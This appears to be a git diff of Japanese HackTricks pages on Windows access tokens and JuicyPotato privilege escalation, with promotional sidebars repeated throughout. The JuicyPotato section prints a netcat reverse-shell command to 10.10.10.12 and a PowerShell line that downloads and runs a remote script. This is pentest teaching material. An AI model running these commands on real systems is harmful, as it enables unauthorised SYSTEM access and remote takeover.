* ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
</details>
ただし、使用されている場合でも、<b>uboot</b>がアンロックされているとは限らないことに注意する必要があります。Enterキーが機能しない場合は、Spaceキーなどの異なるキーをチェックしてください。ブートローダーがロックされており中断されない場合、この方法は機能しません。デバイスのブート時にUARTコンソールの出力をチェックして、<b>uboot</b>がブートローダーであるかどうかを確認してください。ブート時に<b>uboot</b>が言及されるかもしれません。

96
windows-hardening/windows-local-privilege-escalation/access-tokens.md
View file

@ -1,23 +1,36 @@
# Access Tokens
# アクセス トークン
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じて、ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricks で企業を宣伝**してみたいですか?または **最新バージョンの PEASS にアクセスしたり、HackTricks を PDF でダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見しましょう。独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションです。
* [**公式 PEASS & HackTricks スワッグ**](https://peass.creator-spring.com) を手に入れましょう
* **💬** [**Discord グループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live) **をフォロー**してください
* **ハッキングテクニックを共有するには、** [**hacktricks リポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud リポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **に PR を提出してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加**または[telegramグループ](https://t.me/peass)に参加し、**Twitter**で私をフォロー🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングトリックを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スチーラーマルウェア**によって**侵害**されているかどうかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## アクセス トークン
**システムにログインした各ユーザーは、そのログオンセッションのセキュリティ情報を持つアクセス トークンを保持**しています。ユーザーがログオンすると、システムはアクセス トークンを作成します。**ユーザーの代理で実行されるすべてのプロセスには、アクセス トークンのコピーがあります**。トークンには、ユーザー、ユーザーのグループ、およびユーザーの特権を識別する情報が含まれています。また、トークンには、現在のログオンセッションを識別するログオン SIDセキュリティ識別子も含まれています。
この情報は `whoami /all` を実行して確認できます。
**システムにログインした各ユーザーは、そのログオンセッションのセキュリティ情報を持つアクセス トークンを保持しています。** ユーザーがログオンすると、システムはアクセス トークンを作成します。**ユーザーの代わりに実行されるすべてのプロセスには、アクセス トークンのコピーがあります。** トークンには、ユーザー、ユーザーのグループ、およびユーザーの特権が識別されます。 トークンには、現在のログオンセッションを識別するログオンSIDセキュリティ識別子も含まれています。
この情報は、`whoami /all`を実行して確認できます。
```
whoami /all
@ -61,49 +74,44 @@ SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
```
または、Sysinternalsの_Process Explorer_を使用するプロセスを選択して"Security"タブにアクセス):
または、Sysinternalsの\_Process Explorer\_を使用するプロセスを選択して"Security"タブにアクセス):
![](<../../.gitbook/assets/image (321).png>)
![](<../../.gitbook/assets/image (769).png>)
### ローカル管理者
ローカル管理者がログインすると、**2つのアクセス トークンが作成**されます1つは管理者権限を持ち、もう1つは通常の権限を持ちます。**デフォルトでは**、このユーザーがプロセスを実行するときは、**通常**(管理者でない)**権限を使用**します。このユーザーが管理者として何かを**実行**しようとすると(たとえば"管理者として実行"を選択すると)、**UAC**が許可を求めるために使用されます。\
\[UACについて詳しく知りたい場合は、[このページを読んでください](../authentication-credentials-uac-and-efs/#uac)\*\*。
ローカル管理者がログインすると、**2つのアクセス トークンが作成**されます1つは管理者権限を持ち、もう1つは通常の権限を持ちます。**デフォルトでは**、このユーザーがプロセスを実行するときは、**通常の**(管理者でない)**権限が使用されます**。このユーザーが管理者として何かを実行しようとすると(たとえば"管理者として実行")、**UAC**が許可を求めるために使用されます。\
[**UACについて詳しく学びたい場合は、このページを読んでください**](../authentication-credentials-uac-and-efs/#uac)**。**
### 資格情報ユーザーの偽装
### 資格情報ユーザーの模倣
他のユーザーの**有効な資格情報**を持っている場合、それらの資格情報で**新しいログオン セッションを作成**できます:
```
runas /user:domain\username cmd.exe
```
**アクセス トークン** には、**LSASS** 内のログオン セッションの **参照** も含まれており、プロセスがネットワークのオブジェクトにアクセスする必要がある場合に役立ちます。\
ネットワーク サービスにアクセスするために **異なる資格情報を使用するプロセス** を起動できます。
**アクセス トークン** には、**LSASS** 内のログオン セッションの **参照** も含まれています。これは、プロセスがネットワークのオブジェクトにアクセスする必要がある場合に役立ちます。\
次の方法で、ネットワーク サービスにアクセスするために **異なる資格情報を使用するプロセス** を起動できます:
```
runas /user:domain\username /netonly cmd.exe
```
### トークンの種類
利用可能な2種類のトークンがあります:
利用可能なトークンには2種類あります
* **プライマリトークン**:プロセスのセキュリティ資格情報の表現として機能します。プライマリトークンの作成とプロセスへの関連付けは昇格された特権を必要とするアクションであり、特権の分離の原則を強調しています。通常、認証サービスがトークンの作成を担当し、ログオンサービスがユーザーのオペレーティングシステムシェルとの関連付けを処理します。プロセスは作成時に親プロセスのプライマリトークンを継承することに注意する価値があります。
* **模倣トークン**:サーバーアプリケーションが一時的にクライアントのアイデンティティを採用して安全なオブジェクトにアクセスするための権限を与えます。このメカニズムは、次の4つの操作レベルに分類されます:
* **匿名**:未識別のユーザーと同様のサーバーアクセスを許可します。
* **識別**:オブジェクトアクセスに使用せずにクライアントのアイデンティティをサーバーが検証できるようにします。
* **模倣**:サーバーがクライアントのアイデンティティの下で操作できるようにします。
* **委任**:模倣に似ていますが、サーバーが対話するリモートシステムにこのアイデンティティの仮定を拡張できる能力を含み、資格情報の保持を確保します。
- **プライマリトークン**:プロセスのセキュリティ資格情報の表現として機能します。プライマリトークンの作成とプロセスへの関連付けは昇格された特権を必要とするアクションであり、特権の分離の原則を強調しています。通常、認証サービスがトークンの作成を担当し、ログオンサービスがユーザーのオペレーティングシステムシェルとの関連付けを処理します。プロセスは作成時に親プロセスのプライマリトークンを継承ます。
- **模倣トークン**:サーバーアプリケーションが一時的にクライアントのアイデンティティを採用して安全なオブジェクトにアクセスするための権限を与えます。このメカニズムは次の4つの操作レベルに分層されます:
- **匿名**:未識別のユーザーと同様のサーバーアクセスを許可します。
- **識別**:オブジェクトアクセスに使用せずにクライアントのアイデンティティをサーバーが確認できるようにします。
- **模倣**:サーバーがクライアントのアイデンティティの下で操作できるようにします。
- **委任**:模倣に似ていますが、サーバーが相互作用するリモートシステムにこのアイデンティティ仮定を拡張し、資格情報の保持を確保します。
#### トークンの模倣
十分な特権を持っている場合、metasploitの**incognito**モジュールを使用して他の**トークン**を簡単に**リスト**および**模倣**することができます。これは**他のユーザーとして操作を行う**のに役立つ場合があります。このテクニックを使用して**特権を昇格**することもできます。
十分な特権がある場合、metasploitの**incognito**モジュールを使用して他の**トークン**を簡単に**リスト**および**模倣**できます。これは**他のユーザーであるかのようにアクションを実行**したり、このテクニックを使用して**特権を昇格**するのに役立ちます。
### トークン特権
**特権を昇格させるために悪用できるトークン特権**を学びます:
**特権を昇格させるために悪用できる**トークン特権を学びます:
{% content-ref url="privilege-escalation-abusing-tokens.md" %}
[privilege-escalation-abusing-tokens.md](privilege-escalation-abusing-tokens.md)
@ -113,4 +121,28 @@ runas /user:domain\username /netonly cmd.exe
## 参考文献
このチュートリアルでトークンについて詳しく学ぶ:[https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa)および[https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。
このチュートリアルでトークンについて詳しく学ぶ:[https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) および [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認するための**無料**機能を提供します。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですか?または、**PDFでHackTricksをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます。
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れます。
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)。
- **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
</details>

102
windows-hardening/windows-local-privilege-escalation/juicypotato.md
View file

@ -2,65 +2,78 @@
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を通じて**ゼロからヒーローまでAWSハッキングを学びましょう**</summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで企業を宣伝**してみたいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するには、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
* **[💬](https://emojipedia.org/speech-balloon/)Discordグループ**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングトリックを共有するには、PRを** [**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかを確認するための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、無料でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
**JuicyPotatoは**Windows Server 2019およびWindows 10ビルド1809以降では動作しません。ただし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)を使用して、**同じ特権を利用して`NT AUTHORITY\SYSTEM`**レベルのアクセスを取得できます。 _**チェック:**_
**JuicyPotatoは**Windows Server 2019およびWindows 10ビルド1809以降では動作しません。ただし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)を使用して、**同じ特権を利用して`NT AUTHORITY\SYSTEM`**レベルのアクセスを取得できます。_**チェック:**_
{% endhint %}
{% content-ref url="roguepotato-and-printspoofer.md" %}
[roguepotato-and-printspoofer.md](roguepotato-and-printspoofer.md)
{% endcontent-ref %}
## Juicy Potato黄金の特権を悪用する <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
## Juicy Potato黄金特権の悪用 <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
_**RottenPotatoNG**](https://github.com/breenmachine/RottenPotatoNG)_の甘いバージョンで、少しジュースを加えたもの、つまり**WindowsサービスアカウントからNT AUTHORITY\SYSTEMへの別のローカル特権昇格ツール**
_**RottenPotatoNG**_の甘いバージョンで、つまり**WindowsサービスアカウントからNT AUTHORITY\SYSTEMへの別のローカル特権昇格ツール**_
#### [juicypotatoをここからダウンロードできます](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
#### [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)からjuicypotatoをダウンロードできます
### 概要 <a href="#summary" id="summary"></a>
**[juicy-potato Readmeから](https://github.com/ohpe/juicy-potato/blob/master/README.md):**
[**juicy-potato Readmeから**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)およびその[バリアント](https://github.com/decoder-it/lonelypotato)は、[`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [サービス](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126)に基づく特権昇格チェーンを活用し、MiTMリスナーが`127.0.0.1:6666`で動作し、`SeImpersonate`または`SeAssignPrimaryToken`特権を持っている場合に発生します。 Windowsビルドのレビュー中に、`BITS`が意図的に無効にされ、ポート`6666`が使用されているセットアップを見つけました。
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)およびその[バリアント](https://github.com/decoder-it/lonelypotato)は、[`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [サービス](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126)に基づく特権昇格チェーンを活用し、MiTMリスナーが`127.0.0.1:6666`で動作し、`SeImpersonate`または`SeAssignPrimaryToken`特権を持っているときに発生します。Windowsビルドのレビュー中に、`BITS`が意図的に無効にされ、ポート`6666`が使用されているセットアップを見つけました。
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)を武器化することにしました:**Juicy Potatoにこんにちはと言ってください**。
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)を武器化することにしました:**Juicy Potatoをご覧ください**。
> 理論については、[Rotten Potato - サービスアカウントからSYSTEMへの特権昇格](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)を参照し、リンクと参照先のチェーンに従ってください。
> 理論については、[Rotten Potato - サービスアカウントからSYSTEMへの特権昇格](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)を参照し、リンクと参照先のチェーンをたどってください。
私たちは、`BITS`以外にも悪用できるCOMサーバーがいくつかあることを発見しました。それらは単に次のようにする必要があります
1. 現在のユーザーによってインスタンス化可能であること。通常はインパーソネーション特権を持つ「サービスユーザー」です
2. `IMarshal`インターフェースを実装する
3. 昇格されたユーザーSYSTEM、管理者、...)として実行される
1. 現在のユーザー(通常はインパーソネーション特権を持つ「サービスユーザー」)によってインスタンス化できること
2. `IMarshal`インターフェースを実装すること
3. 昇格されたユーザーSYSTEM、管理者、...)として実行すること
いくつかのテストの後、いくつかのWindowsバージョンで[興味深いCLSIDの](http://ohpe.it/juicy-potato/CLSID/)詳細なリストを取得してテストしました。
いくつかのテストの後、いくつかのWindowsバージョンで興味深い[CLSIDのリスト](http://ohpe.it/juicy-potato/CLSID/)を取得してテストしました。
### Juicy details <a href="#juicy-details" id="juicy-details"></a>
### 興味深い詳細 <a href="#juicy-details" id="juicy-details"></a>
JuicyPotatoを使用すると、次のことができます
* **ターゲットCLSID** _希望するCLSIDを選択します。_ [_こちら_](http://ohpe.it/juicy-potato/CLSID/) _でOSごとに整理されたリストを見つけることができます。_
* **ターゲットCLSID** _希望するCLSIDを選択します。_ [_こ_](http://ohpe.it/juicy-potato/CLSID/) _でOSごとに整理されたリストを見つけることができます。_
* **COMリスニングポート** _マーシャリングされたハードコードされた6666の代わりに好きなCOMリスニングポートを定義します_
* **COMリスニングIPアドレス** _サーバーを任意のIPにバインドします_
* **プロセス作成モード** _インパーソネーションされたユーザーの特権に応じて、次から選択できます_
* **プロセス作成モード** _インパーソネーションユーザーの特権に応じて、次から選択できます_
* `CreateProcessWithToken``SeImpersonate`が必要)
* `CreateProcessAsUser``SeAssignPrimaryToken`が必要)
* `両方`
* **起動するプロセス** _悪用に成功した場合に実行する実行可能ファイルまたはスクリプトを起動します_
* **プロセス引数** _起動されるプロセスの引数をカスタマイズします_
* **RPCサーバーアドレス** _ステルスアプローチのために外部RPCサーバーに認証できます_
* **RPCサーバーアドレス** _ステルスアプローチのために外部RPCサーバーに認証できます_
* **RPCサーバーポート** _外部サーバーに認証する場合で、ファイアウォールがポート`135`をブロックしている場合に便利です..._
* **TESTモード** _主にテスト目的で、CLSIDsのテストに使用します。DCOMを作成し、トークンのユーザーを表示します。テストについては_ [_こちらを参照してください_](http://ohpe.it/juicy-potato/Test/)
* **TESTモード** _主にテスト目的で、CLSIDsのテストに使用されます。DCOMを作成し、トークンのユーザーを表示します。テストについては_ [_こちらを参照してください_](http://ohpe.it/juicy-potato/Test/)
### 使用法 <a href="#usage" id="usage"></a>
```
T:\>JuicyPotato.exe
@ -80,21 +93,21 @@ Optional args:
```
### 最終的な考え <a href="#final-thoughts" id="final-thoughts"></a>
**[juicy-potato Readmeから](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts):**
[**Juicy Potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
ユーザーが`SeImpersonate`または`SeAssignPrimaryToken`特権を持っている場合、あなたは**SYSTEM**です。
ユーザーが `SeImpersonate` または `SeAssignPrimaryToken` 特権を持っている場合、あなたは **SYSTEM** です。
これらのすべてのCOMサーバーの悪用を防ぐのはほぼ不可能です。これらのオブジェクトのアクセス許可を`DCOMCNFG`を介して変更することを考えることができますが、成功を祈ります。これは挑戦的な作業になるでしょう。
これらのすべての COM サーバーの悪用を防ぐのはほぼ不可能です。これらのオブジェクトのアクセス許可を `DCOMCNFG` を介して変更することを考えることができますが、成功を祈ります、これは挑戦的になるでしょう。
実際の解決策は、`* SERVICE`アカウントで実行される機密アカウントおよびアプリケーションを保護することです。`DCOM`を停止することは、確かにこのエクスプロイトを阻止しますが、基礎となるOSに深刻な影響を与える可能性があります。
実際の解決策は、`* SERVICE` アカウントで実行される機密アカウントおよびアプリケーションを保護することです。`DCOM` を停止することはこのエクスプロイトを阻止するでしょうが、基礎となる OS に深刻な影響を与える可能性があります。
出典: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
## 例
注意: 試すためのCLSIDsのリストについては、[このページ](https://ohpe.it/juicy-potato/CLSID/)を参照してください。
注意: 試すための CLSID のリストについては、[このページ](https://ohpe.it/juicy-potato/CLSID/) を参照してください。
### nc.exeリバースシェルを取得
### nc.exeシェルを取得
```
c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *
@ -107,15 +120,13 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
c:\Users\Public>
```
### Powershell rev
### Powershell逆
### Powershell 逆
```
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
```
### 新しいCMDを起動するRDPアクセスがある場合
![](<../../.gitbook/assets/image (37).png>)
![](<../../.gitbook/assets/image (297).png>)
## CLSIDの問題
@ -127,23 +138,36 @@ c:\Users\Public>
まず、juicypotato.exe以外のいくつかの実行可能ファイルが必要です。
[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1)をダウンロードしてPSセッションに読み込み、[GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)をダウンロードして実行します。そのスクリプトは、テストする可能性のあるCLSIDのリストを作成します。
[Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1)をダウンロードしてPSセッションにロードし、[GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)をダウンロードして実行します。そのスクリプトは、テストする可能性のあるCLSIDのリストを作成します。
次に、[test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(CLSIDリストへのパスとjuicypotato実行可能ファイルへのパスを変更してください)をダウンロードして実行します。すべてのCLSIDを試行し始め、**ポート番号が変更されると、CLSIDが機能したことを意味します**。
次に、[test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(CLSIDリストへのパスとjuicypotato実行可能ファイルへのパスを変更してください)をダウンロードして実行します。すべてのCLSIDを試行し始め、**ポート番号が変ると、CLSIDが機能したことを意味します**。
**動作するCLSIDを**パラメータ -c を使用して**確認します**
## 参考文献
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセス**したいですかまたは、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れます
* **💬**[**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセス**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れる
* **[💬](https://emojipedia.org/speech-balloon/)Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **ハッキングトリックを共有するために**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と**[**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
</details>

52
windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
View file

@ -6,19 +6,33 @@
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、**あなたのハッキングテクニックを共有**してください
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する。
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、**ハッキングトリックを共有**する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
{% hint style="warning" %}
